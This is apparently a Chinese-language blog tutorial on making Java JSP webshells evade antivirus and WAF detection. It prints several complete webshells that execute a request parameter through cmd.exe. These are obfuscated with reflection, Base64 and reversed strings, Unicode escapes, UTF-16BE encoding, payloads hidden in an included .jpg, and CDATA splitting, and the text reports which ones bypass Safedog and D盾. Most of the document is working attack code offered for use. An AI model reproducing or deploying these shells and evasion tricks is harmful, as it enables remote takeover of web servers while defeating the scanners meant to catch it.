前言
php的一句话木马即可以直接命令执行又可以作为冰蝎、蚁剑的客户端,而java就显得比较复杂。在经过java基础学习之后,尝试对java命令执行的webshell进行免杀处理。
命令执行
在之前的 Java 命令执行 中学习了执行系统命令的几个类。
这次我们还是以经典的Runtime类来测试。
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*"%>
<%
out.print(System.getProperty("os.name").toLowerCase());
String cmd = request.getParameter("cmd");
if(cmd != null){
Process p = Runtime.getRuntime().exec(new String[]{"cmd.exe","/c",cmd});
InputStream input = p.getInputStream();
InputStreamReader ins = new InputStreamReader(input, "GBK");
BufferedReader br = new BufferedReader(ins);
out.print("<pre>");
String line;
while((line = br.readLine()) != null) {
out.println(line);
}
out.print("</pre>");
br.close();
ins.close();
input.close();
p.getOutputStream().close();
}
%>
该文件有着明显的exec危险代码。
image.png
反射
利用反射来免杀webshell是常用技术之一。反射的编写过程参考Java 反射机制学习
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*"%>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.lang.reflect.Method" %>
<%
out.print(System.getProperty("os.name").toLowerCase());
String cmd = request.getParameter("cmd");
if(cmd != null){
Class clazz = Class.forName("java.lang.Runtime");
Constructor declaredConstructor = clazz.getDeclaredConstructor();
declaredConstructor.setAccessible(true);
Object o = declaredConstructor.newInstance();
Method show = clazz.getDeclaredMethod("exec", String[].class);
String[] cmds = new String[]{"cmd.exe","/c",cmd};
Object invoke = show.invoke(o,(Object)cmds);
Process p = (Process) invoke;
InputStream input = p.getInputStream();
InputStreamReader ins = new InputStreamReader(input, "GBK");
BufferedReader br = new BufferedReader(ins);
out.print("<pre>");
String line;
while((line = br.readLine()) != null) {
out.println(line);
}
out.print("</pre>");
br.close();
ins.close();
input.close();
p.getOutputStream().close();
}
%>
还可以通过base64编码的方式将关键字符串java.lang.Runtime编码起来。
String a = new String(Base64.getDecoder().decode("amF2YS5sYW5nLlJ1bnRpbWU="));
System.out.println(a);
又或者创建一个方法来反转字符串。
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*"%>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.lang.reflect.Method" %>
<%!public static String reverseStr(String str){return new StringBuilder(str).reverse().toString();}%>
<%
out.print(System.getProperty("os.name").toLowerCase());
String cmd = request.getParameter("cmd");
if(cmd != null){
Class clazz = Class.forName(reverseStr("emitnuR.gnal.avaj"));
Constructor declaredConstructor = clazz.getDeclaredConstructor();
declaredConstructor.setAccessible(true);
Object o = declaredConstructor.newInstance();
Method show = clazz.getDeclaredMethod(reverseStr("cexe"), String[].class);
String[] cmds = new String[]{"cmd.exe","/c",cmd};
Object invoke = show.invoke(o,(Object)cmds);
Process p = (Process) invoke;
InputStream input = p.getInputStream();
InputStreamReader ins = new InputStreamReader(input, "GBK");
BufferedReader br = new BufferedReader(ins);
out.print("<pre>");
String line;
while((line = br.readLine()) != null) {
out.println(line);
}
out.print("</pre>");
br.close();
ins.close();
input.close();
p.getOutputStream().close();
}
%>
image.png
include 指令
Java Web 里有一个include指令,可以将外部文件嵌入到当前jsp语句中,并同时解析页面的jsp语句。
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*"%>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.lang.reflect.Method" %>
<%@ include file = "1.jpg" %>
1.jpg 编写恶意代码。
<%
out.print(System.getProperty("os.name").toLowerCase());
String cmd = request.getParameter("cmd");
if(cmd != null){
Class clazz = Class.forName("java.lang.Runtime");
Constructor declaredConstructor = clazz.getDeclaredConstructor();
declaredConstructor.setAccessible(true);
Object o = declaredConstructor.newInstance();
Method show = clazz.getDeclaredMethod("exec", String[].class);
String[] cmds = new String[]{"cmd.exe","/c",cmd};
Object invoke = show.invoke(o,(Object)cmds);
Process p = (Process) invoke;
InputStream input = p.getInputStream();
InputStreamReader ins = new InputStreamReader(input, "GBK");
BufferedReader br = new BufferedReader(ins);
out.print("<pre>");
String line;
while((line = br.readLine()) != null) {
out.println(line);
}
out.print("</pre>");
br.close();
ins.close();
input.close();
p.getOutputStream().close();
}
%>
访问也是可以正常执行命令。
image.png
因为安全狗、D盾主要查杀Runtime.getRuntime().exec(),在使用include的情况下可以绕过D盾无法绕过安全狗。当再次利用反射机制就可以成功绕过。
image.png
编码
Java 程序可以自动识别Unicode编码,所以我们可以将java源代码除了page指令的代码外,全部编码。
先在网上查找一个字符串与Unicode编码相互转换的类。
public void convert(String str) {
str = (str == null ? "" : str);
String tmp;
StringBuffer sb = new StringBuffer(1000);
char c;
int i, j;
sb.setLength(0);
for (i = 0; i < str.length(); i++) {
c = str.charAt(i);
sb.append("\\u");
j = (c >>> 8); //取出高8位
tmp = Integer.toHexString(j);
if (tmp.length() == 1)
sb.append("0");
sb.append(tmp);
j = (c & 0xFF); //取出低8位
tmp = Integer.toHexString(j);
if (tmp.length() == 1)
sb.append("0");
sb.append(tmp);
}
System.out.print(new String(sb));
}
再创建一个方法,通过读取文本文件的方式调用convert()方法将上面的命令执行的代码编码。
public void test2() throws IOException {
File srcfile = new File("a.txt");
FileReader fileReader = new FileReader(srcfile);
BufferedReader bufferedReader = new BufferedReader(fileReader);
String s;
while ((s = bufferedReader.readLine()) != null) {
convert(s);
System.out.print("\r\n");
}
}
运行后得到Unicode编码后的代码,再把原来page指令声明上即可。
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*"%>
<%
\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028\u0053\u0079\u0073\u0074\u0065\u006d\u002e\u0067\u0065\u0074\u0050\u0072\u006f\u0070\u0065\u0072\u0074\u0079\u0028\u0022\u006f\u0073\u002e\u006e\u0061\u006d\u0065\u0022\u0029\u002e\u0074\u006f\u004c\u006f\u0077\u0065\u0072\u0043\u0061\u0073\u0065\u0028\u0029\u0029\u003b
\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u0020\u0063\u006d\u0064\u0020\u003d\u0020\u0072\u0065\u0071\u0075\u0065\u0073\u0074\u002e\u0067\u0065\u0074\u0050\u0061\u0072\u0061\u006d\u0065\u0074\u0065\u0072\u0028\u0022\u0063\u006d\u0064\u0022\u0029\u003b
\u0069\u0066\u0028\u0063\u006d\u0064\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u007b
\u0020\u0020\u0020\u0020\u0050\u0072\u006f\u0063\u0065\u0073\u0073\u0020\u0070\u0020\u003d\u0020\u0020\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u002e\u0067\u0065\u0074\u0052\u0075\u006e\u0074\u0069\u006d\u0065\u0028\u0029\u002e\u0065\u0078\u0065\u0063\u0028\u006e\u0065\u0077\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u005b\u005d\u007b\u0022\u0063\u006d\u0064\u002e\u0065\u0078\u0065\u0022\u002c\u0022\u002f\u0063\u0022\u002c\u0063\u006d\u0064\u007d\u0029\u003b
\u0020\u0020\u0020\u0020\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0020\u0069\u006e\u0070\u0075\u0074\u0020\u003d\u0020\u0070\u002e\u0067\u0065\u0074\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u003b
\u0020\u0020\u0020\u0020\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0052\u0065\u0061\u0064\u0065\u0072\u0020\u0069\u006e\u0073\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0049\u006e\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u0069\u006e\u0070\u0075\u0074\u002c\u0020\u0022\u0047\u0042\u004b\u0022\u0029\u003b
\u0020\u0020\u0020\u0020\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0052\u0065\u0061\u0064\u0065\u0072\u0020\u0062\u0072\u0020\u003d\u0020\u006e\u0065\u0077\u0020\u0042\u0075\u0066\u0066\u0065\u0072\u0065\u0064\u0052\u0065\u0061\u0064\u0065\u0072\u0028\u0069\u006e\u0073\u0029\u003b
\u0020\u0020\u0020\u0020\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028\u0022\u003c\u0070\u0072\u0065\u003e\u0022\u0029\u003b
\u0020\u0020\u0020\u0020\u0053\u0074\u0072\u0069\u006e\u0067\u0020\u006c\u0069\u006e\u0065\u003b
\u0020\u0020\u0020\u0020\u0077\u0068\u0069\u006c\u0065\u0028\u0028\u006c\u0069\u006e\u0065\u0020\u003d\u0020\u0062\u0072\u002e\u0072\u0065\u0061\u0064\u004c\u0069\u006e\u0065\u0028\u0029\u0029\u0020\u0021\u003d\u0020\u006e\u0075\u006c\u006c\u0029\u0020\u007b
\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u0020\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u006c\u006e\u0028\u006c\u0069\u006e\u0065\u0029\u003b
\u0020\u0020\u0020\u0020\u007d
\u0020\u0020\u0020\u0020\u006f\u0075\u0074\u002e\u0070\u0072\u0069\u006e\u0074\u0028\u0022\u003c\u002f\u0070\u0072\u0065\u003e\u0022\u0029\u003b
\u0020\u0020\u0020\u0020\u0062\u0072\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b
\u0020\u0020\u0020\u0020\u0069\u006e\u0073\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b
\u0020\u0020\u0020\u0020\u0069\u006e\u0070\u0075\u0074\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b
\u0020\u0020\u0020\u0020\u0070\u002e\u0067\u0065\u0074\u004f\u0075\u0074\u0070\u0075\u0074\u0053\u0074\u0072\u0065\u0061\u006d\u0028\u0029\u002e\u0063\u006c\u006f\u0073\u0065\u0028\u0029\u003b
\u007d
%>
image.png
D盾依然可以查杀,安全狗顺利绕过。
那么Unicode 编码还能怎么处理呢?Unicode编码的关键点在于以'\u'开头表明和unicode编码相关。
可以将'u'重复声明,即'\uuuuuuu'
<%
out.println("\uuuuuu006f\uuuuuuuuuuuuuuuuuu0075\uuu0074");
%>
将上面代码稍做调整
sb.append("\\uuuuu");
再次生成webshell,可成功绕过D盾。
image.png
java 同样支持其他编码格式
import chardet
import codecs
filename_in = 'webshell.txt'
filename_out = 'utf-16be_es.jsp'
with codecs.open(filename=filename_in, mode='r', encoding='utf-8') as fi:
data = fi.read()
with open(filename_out, mode='w') as fo:
fo.write('<%@ page contentType="charset=utf-16be" %>')
fo.write(data.encode('utf-16be'))
fo.close()
如 utf-16be 编码方式
image.png
扩展
在绕过某些WAF时,WAF可能会检测jsp标签、客户端传入的参数以及威胁命令。
对应jsp标签<%%>,可以使用<jsp:scriptlet></jsp:scriptlet>代替。
且不需要import导入,定义完整的类名。
<jsp:scriptlet>
out.print(System.getProperty("os.name").toLowerCase());
String cmd = request.getParameter("cmd");
if(cmd != null){
Class clazz = Class.forName("java.lang.Runtime");
java.lang.reflect.Constructor declaredConstructor = clazz.getDeclaredConstructor();
declaredConstructor.setAccessible(true);
Object o = declaredConstructor.newInstance();
java.lang.reflect.Method show = clazz.getDeclaredMethod("exec", String[].class);
String[] cmds = new String[]{"cmd.exe","/c",cmd};
Object invoke = show.invoke(o,(Object)cmds);
Process p = (Process) invoke;
java.io.InputStream input = p.getInputStream();
java.io.InputStreamReader ins = new java.io.InputStreamReader(input, "GBK");
java.io.BufferedReader br = new java.io.BufferedReader(ins);
String line;
while((line = br.readLine()) != null) {
out.println(line);
}
br.close();
ins.close();
input.close();
p.getOutputStream().close();
}
</jsp:scriptlet>
对于参数先将其存储进会话然后调用。
request.setAttribute("a",request.getParameter("cmd"));
String cmd = request.getAttribute("a").toString();
如果检测威胁命令可以对其进行编码,这里选择ASCII编码进行测试。
对应服务端代码该为:
String decode = java.net.URLDecoder.decode(cmd.replaceAll("\\\\x", "%"), "utf-8");
String[] cmds = new String[]{"cmd.exe","/c",decode};
此时既可以输入whoami,也可以输入十六进制编码后的%5c%78%37%37%5c%78%36%38%5c%78%36%66%5c%78%36%31%5c%78%36%64%5c%78%36%39
image.png
或者base64编码加反转等等都可以。
<%@ page language="java" contentType="text/html;charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*"%>
<%@ page import="java.util.Base64" %>
<%@ page import="java.lang.reflect.Constructor" %>
<%@ page import="java.lang.reflect.Method" %>
<%!public static String reverseStr(String str){return new StringBuilder(str).reverse().toString();}%>
<%
out.print(System.getProperty("os.name").toLowerCase());
String bs64 = request.getParameter("cmd");
if(bs64 != null){
String cmd = new String(Base64.getDecoder().decode(reverseStr(bs64)),"UTF-8");
Class clazz = Class.forName("java.lang.Runtime");
Constructor declaredConstructor = clazz.getDeclaredConstructor();
declaredConstructor.setAccessible(true);
Object o = declaredConstructor.newInstance();
Method show = clazz.getDeclaredMethod("exec", String[].class);
String[] cmds = new String[]{"cmd.exe","/c",cmd};
Object invoke = show.invoke(o,(Object)cmds);
Process p = (Process) invoke;
InputStream input = p.getInputStream();
InputStreamReader ins = new InputStreamReader(input, "GBK");
BufferedReader br = new BufferedReader(ins);
out.print("<pre>");
String line;
while((line = br.readLine()) != null) {
out.println(line);
}
out.print("</pre>");
br.close();
ins.close();
input.close();
p.getOutputStream().close();
}
%>
对应客户端传入的命令也就是base64编码后反转的字符串。
image.png
CDATA特性
在XML元素里,<和&是非法的,遇到<解析器会把该字符解释为新元素的开始,遇到&解析器会把该字符解释为字符实体化编码的开始。
我们有时候需要在jspx里添加js代码用到大量的<和&字符,因此可以将脚本代码定义为CDATA。
DATA部分内容会被解析器忽略。
<?xml version="1.0" encoding="UTF-8"?>
<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
version="1.2">
<jsp:directive.page contentType="text/html"/>
<jsp:declaration>
</jsp:declaration>
<jsp:scriptlet>
<![CDATA[o]]>u<![CDATA[t.writ]]><![CDATA[e]]>("123!");
out.print(System.getProperty("os.name").toLowerCase());
String cmd = <![CDATA[re]]>q<![CDATA[uest.getPar]]><![CDATA[ameter]]>("cmd");
if(cmd != null){
Class clazz = Class.forName("java.lang.Runtime");
java.lang.reflect.Constructor declaredConstructor = clazz.getDeclaredConstructor();
declaredConstructor.setAccessible(true);
Object o = declaredConstructor.newInstance();
java.lang.reflect.Method show = <![CDATA[cla]]>z<![CDATA[z.getDec]]><![CDATA[laredMethod]]>("exec", String[].class);
String[] cmds = new String[]{"cmd.exe","/c",cmd};
Object invoke = show.invoke(o,(Object)cmds);
Process p = (Process) invoke;
java.io.InputStream input = p.getInputStream();
java.io.InputStreamReader ins = new java.io.InputStreamReader(input, "GBK");
java.io.BufferedReader br = new java.io.BufferedReader(ins);
String line;
while((line = br.readLine()) != null) {
out.println(line);
}
br.close();
ins.close();
input.close();
p.getOutputStream().close();
}
</jsp:scriptlet>
<jsp:text>
</jsp:text>
</jsp:root>
总结
本文免杀的方式主要利用的知识点是反射和编码,可以达到简单免杀的效果。算是一个学习的切入口。在实际更为复杂的情况下,还要继续学习以类加载器等更多方式进行免杀处理。
